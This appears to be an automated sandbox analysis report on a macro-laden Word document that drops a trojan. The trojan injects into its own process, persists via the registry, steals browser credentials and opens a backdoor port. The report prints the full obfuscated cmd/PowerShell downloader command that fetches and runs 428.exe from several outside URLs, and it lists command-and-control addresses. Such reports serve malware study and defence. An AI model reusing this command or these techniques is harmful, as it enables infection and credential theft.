bded6d7d...74b7

Severity	Category	Operation	Classification
5/5	Injection	Writes into the memory of a process running from a created or modified executable	-
"c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe" modifies memory of "c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe" ... VTI Actions Go to function call
5/5	Injection	Modifies control flow of a process running from a created or modified executable	-
"c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe" alters context of "c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe" ... VTI Actions Go to function call
5/5	Network	Sets up server that accepts incoming connections	Backdoor
UDP server listens on port "50069". ... VTI Actions Go to function call
4/5	Process	Creates process	-
Creates process "cmd /V^:/C"^s^et z^q^j8=^ ^ ^ ^ ^ ^ ^}}{^hctac^};k^aerb^;jq^j$ ^me^t^I-^ekovnI;)^jqj^$^ ^,VT^O^$(e^liFdao^ln^w^oD^.VR^T^${^yrt{)pm^i^$ n^i VT^O$(^hca^er^of;'^ex^e.'^+FaR^$+^'^\^'+ci^lb^up^:vne$^=j^q^j$^;'8^24^'^ ^=^ ^FaR$^;)^'@^'(tilpS.'^6^XLE^B^d^b^EF^k/^moc^.se^i^g^ol^on^hc^etnavda//^:^p^tt^h^@^g59QLoG/au^.m^oc^.s^p^i^hc^do^o^w//^:p^tth@6Ur^grTZD/^tnetn^oc^-^p^w/ri^.ca^.umhs^.^udrc//:^p^t^th^@F^D^8vH^fL/^sd^a^o^lpu/tn^etnoc^-p^w/m^oc.^tesrocv^.w^w^w//:^p^t^th^@^0^gD^5^e1w^b/^tn^e^tnoc-p^w/di.c^a.gn^a^lam^-n^iu.^i^s^amra^f//^:^ptt^h'=^p^mi^$^;tn^e^i^lC^be^W.^teN^ ^tce^j^bo-wen^=VRT$^ l^l^e^h^sr^ewo^p&&^for /^L %^y ^in (4^26,-^1,^0)^do ^se^t 5^d^UZ=!5^d^UZ!!z^q^j8:~%^y,1!&&^i^f %^y ^l^s^s ^1 ca^l^l %5^d^UZ:^~^6%"". ... VTI Actions Go to function call
Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". ... VTI Actions Go to function call
Creates process "C:\Users\Public\428.exe". ... VTI Actions Go to function call
Creates process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe". ... VTI Actions Go to function call
Creates process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"". ... VTI Actions Go to function call
4/5	Information Stealing	Reads browser data	-
Possibly trying to readout browser credentials. ... VTI Actions Go to function call
4/5	Network	Downloads data	Downloader
URL "HTTP://177.242.11.145". ... VTI Actions Go to function call
URL "HTTP://201.132.110.134". ... VTI Actions Go to function call
URL "http://189.212.177.73:443/whoami.php". ... VTI Actions Go to function call
3/5	Persistence	Installs system startup script or application	-
Adds ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"" to Windows startup via registry. ... VTI Actions Go to function call
3/5	Browser	Reads data related to browsing history	-
Reads the browsing history for "Microsoft Internet Explorer". ... VTI Actions Go to function call
3/5	Network	Performs DNS request	-
Resolves host name "239.255.255.250". ... VTI Actions Go to function call
3/5	Browser	Reads data related to saved browser credentials	-
Reads saved credentials for "Mozilla Firefox". ... VTI Actions Go to function call
Reads saved credentials for "Google Chrome". ... VTI Actions Go to function call
3/5	PE	Executes dropped PE file	-
Executes dropped file "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe". ... VTI Actions Go to file details Go to function call
2/5	File System	Known suspicious file	Trojan
File "C:\Users\aETAdzjz\Desktop\Doc379450.doc" is a known suspicious file. ... VTI Actions Go to file details
File "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" is a known suspicious file. ... VTI Actions Go to file details Go to function call
2/5	Network	Connects to HTTP server	-
URL "177.242.11.145". ... VTI Actions Go to function call
URL "201.132.110.134". ... VTI Actions Go to function call
URL "http://201.170.69.112:80/whoami.php". ... VTI Actions Go to function call
URL "http://189.212.177.73:443/whoami.php". ... VTI Actions Go to function call
2/5	PE	Drops PE file	Dropper
Drops file "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe". ... VTI Actions Go to file details Go to function call
2/5	VBA Macro	Executes macro on specific worksheet event	-
Executes macro automatically on target "document" and event "open". ... VTI Actions Go to macro
1/5	Process	Creates system object	-
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to function call
Creates mutex with name "PEMB64". ... VTI Actions Go to function call
Creates mutex with name "PEM8D4". ... VTI Actions Go to function call
Creates mutex with name "Global\I705BA84C". ... VTI Actions Go to function call
Creates mutex with name "Global\M705BA84C". ... VTI Actions Go to function call
Creates mutex with name "PEM8D0". ... VTI Actions Go to function call
Creates mutex with name "PEM9CC". ... VTI Actions Go to function call
Creates mutex with name "Global\Nx513464FA". ... VTI Actions Go to function call
Creates mutex with name "PEM470". ... VTI Actions Go to function call
Creates mutex with name "PEM548". ... VTI Actions Go to function call
1/5	Static	Unparsable sections in file	-
Static analyzer was unable to completely parse the analyzed file: C:\Users\aETAdzjz\Desktop\Doc379450.doc. ... VTI Actions Go to file details
1/5	Static	Contains suspicious meta data	-
Office document contains below average content data. ... VTI Actions Go to file details
1/5	Static	Contains embedded files	-
Document contains unknown embedded files. ... VTI Actions Go to file details
1/5	VBA Macro	Contains Office macro	-
Office document contains a VBA macro. ... VTI Actions Go to file details

Notifications (1/1)

Before

After